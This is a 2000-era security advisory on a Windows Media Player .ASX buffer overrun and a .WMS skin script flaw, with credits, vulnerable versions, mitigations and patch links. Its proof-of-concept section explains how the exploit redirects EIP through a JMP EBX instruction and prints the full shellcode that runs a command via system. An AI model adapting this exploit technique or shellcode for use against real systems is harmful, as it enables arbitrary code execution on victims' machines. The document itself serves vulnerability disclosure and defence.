|
|
|
|
| |
Microsoft Windows Media Player plays streaming media files that have the extension .ASX. It is possible to launch a buffer overrun attack, caused by the way Windows Media Player deals with the .ASX file format when using the Web View option in Windows Explorer (enabled by default). This problem allows the execution of arbitrary computer code, and thus makes it possible to create Trojan .ASX files.
One method of exploitation requires the user to save the .ASX file down to the local machine and navigate to it via Explorer. Single clicking once on the file will cause Explorer to Auto-Preview the destination streaming media file that is specified in the .ASX file. Passing a long 'destination' to this media file will cause the buffer overrun to occur and the arbitrary code to execute.
This is another good example of why attachments from unknown sources should not be trusted (even though they are not executable files in the usual sense). This is also why systems/network administrators should evaluate the types of attachments that are allowed to be passed to users desktops even though they may not contain any executable code.
There are other methods of exploitation that could allow .ASX files to be opened automatically when a user visits a malicious web site. Configuring Internet Explorer not to run ActiveX controls can prevent this. |
| |
Credit:
The information has been provided by Ollie Whitehouse from AtStake, GFI and Microsoft Product Security.
|
| |
Vulnerable systems:
Microsoft Media Player v6.xx
Microsoft Media Player v7.xx
Note: The ".ASX Buffer Overrun" affects Windows Media Player versions 6.4 and 7. The ".WMS Script Execution" affects only Windows Media Player version 7. The patch installs the correct fixes for the particular version of Windows Media Player in use.
.ASX Buffer Overrun:
Proof of Concept:
The following file once uncompressed contains 'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed within Explorer with a single click, it will cause Microsoft Explorer to create a file in the root of C: called !test!. This file will contain a directory listing of the current working directory when the proof of concept is executed. Once this proof of concept is executed, it will require Explorer.exe to be restarted.
This example has been hard coded to work with Windows 2000 (SP1) and MSVCRT.DLL v6.1.8637. Another reason why this example is service-pack specific is that the code is randomly located on the stack (so EIP can not be pointed directly to the location of the arbitrary code), EBX is located 4 bytes before EIP. The example overwrites EIP with the address of JMP EBX (FF E2, this instruction is contained in kernel32 and thus static). This in turn then tries to execute the value at EBX (which contains NOPs), then EIP (luckily this does not contain any code which alters or stops program flow) and then finally executes the arbitrary code placed on the stack. The assembly code that is executed by this example at this point is contained at the end of this advisory. Within the ASX file the example code is contained at offset 00005ce4h.
The ASX file that shows this example is contained in this .zip file:
http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip
<-----<Assembly code for proof of concept>-----
[Byte Code] [Assembly]
90 nop
8B DC mov ebx,esp
8B E3 mov esp,ebx
53 push ebx
8B DC mov ebx,esp
33 FF xor edi,edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
C6 43 E9 63 mov byte ptr [ebx-17h],63h
C6 43 EA 6D mov byte ptr [ebx-16h],6Dh
C6 43 EB 64 mov byte ptr [ebx-15h],64h
C6 43 EC 2E mov byte ptr [ebx-14h],2Eh
C6 43 ED 65 mov byte ptr [ebx-13h],65h
C6 43 EE 78 mov byte ptr [ebx-12h],78h
C6 43 EF 65 mov byte ptr [ebx-11h],65h
C6 43 F0 2F mov byte ptr [ebx-10h],2Fh
C6 43 F1 63 mov byte ptr [ebx-0Fh],63h
C6 43 F2 64 mov byte ptr [ebx-0Eh],64h
C6 43 F3 69 mov byte ptr [ebx-0Dh],69h
C6 43 F4 72 mov byte ptr [ebx-0Ch],72h
C6 43 F5 3E mov byte ptr [ebx-0Bh],3Eh
C6 43 F6 63 mov byte ptr [ebx-0Ah],63h
C6 43 F7 3A mov byte ptr [ebx-9],3Ah
C6 43 F8 5C mov byte ptr [ebx-8],5Ch
C6 43 F9 21 mov byte ptr [ebx-7],21h
C6 43 FA 74 mov byte ptr [ebx-6],74h
C6 43 FB 65 mov byte ptr [ebx-5],65h
C6 43 FC 73 mov byte ptr [ebx-4],73h
C6 43 FD 74 mov byte ptr [ebx-3],74h
C6 43 FE 21 mov byte ptr [ebx-2],21h
B8 AD AA 01 78 mov eax,7801AAADh
50 push eax
8D 43 E9 lea eax,[ebx-17h]
50 push eax
FF 53 E4 call dword ptr [ebx-1Ch]
56 push esi
BB 2D F3 E8 77 mov ebx,77E8F32Dh
FF D3 call ebx
C3 ret
<-----<End of code for proof of concept>-----
Recommendation:
The best solution is to install the vendor patch for your version of the media player. This solves this specific problem.
In general, unless you need to run ActiveX controls, it is a good idea to configure Internet Explorer not to run them. At the very least you can configure IE to not run ActiveX controls in the Internet Security Zone. It doesn't matter whether the controls are signed or not. As you can see from this advisory even signed controls can have security problems.
Of course, never trust attachments from unknown sources, even data files such as the .ASX files discussed in this advisory.
Vendor Response:
Microsoft has released the following information:
The two vulnerabilities discussed below are unrelated to each other except by the fact that they both affect Windows Media Player. We packaged them in a single patch to make it more convenient for customers to apply. The vulnerabilities are:
- The ".ASX Buffer Overrun" vulnerability. Windows Media Player supports the use of Active Stream Redirector (.ASX) files to enable users to play streaming media that resides on intranet or Internet sites. However, the code that parses .ASX files has an unchecked buffer, and this could potentially enable a malicious user to run code of his choice on the machine of another user. The malicious user could either send an affected file to another user and entice her to run or preview it, or he could host such a file on a web site and cause it to launch automatically whenever a user visited the site. The code could take any action on the machine that the legitimate user herself could take.
- The ".WMS Script Execution" vulnerability. Windows Media Player 7 introduced a feature called "skins", that allows customization of the look and feel of Windows Media Player. However, a custom skin (.WMS) file could potentially include script, which would execute if Windows Media Player was run and that skin was selected. A malicious user could either send a customized skin containing script to another user and try to entice her into using it, or he could host such a file on a web site and cause it to launch automatically whenever a user visited the site. Because the code would reside on the user's local machine, it would be able to execute ActiveX controls, including ones not marked "safe for scripting". This would enable the code to take any action that can be accomplished via an ActiveX control.
Patch Availability:
- Windows Media Player 6.4:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069
- Windows Media Player 7:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067
Note: The fix for this issue also will be available as part of the next periodic update, scheduled for December 2000.
|
|
|
|
|
|
|
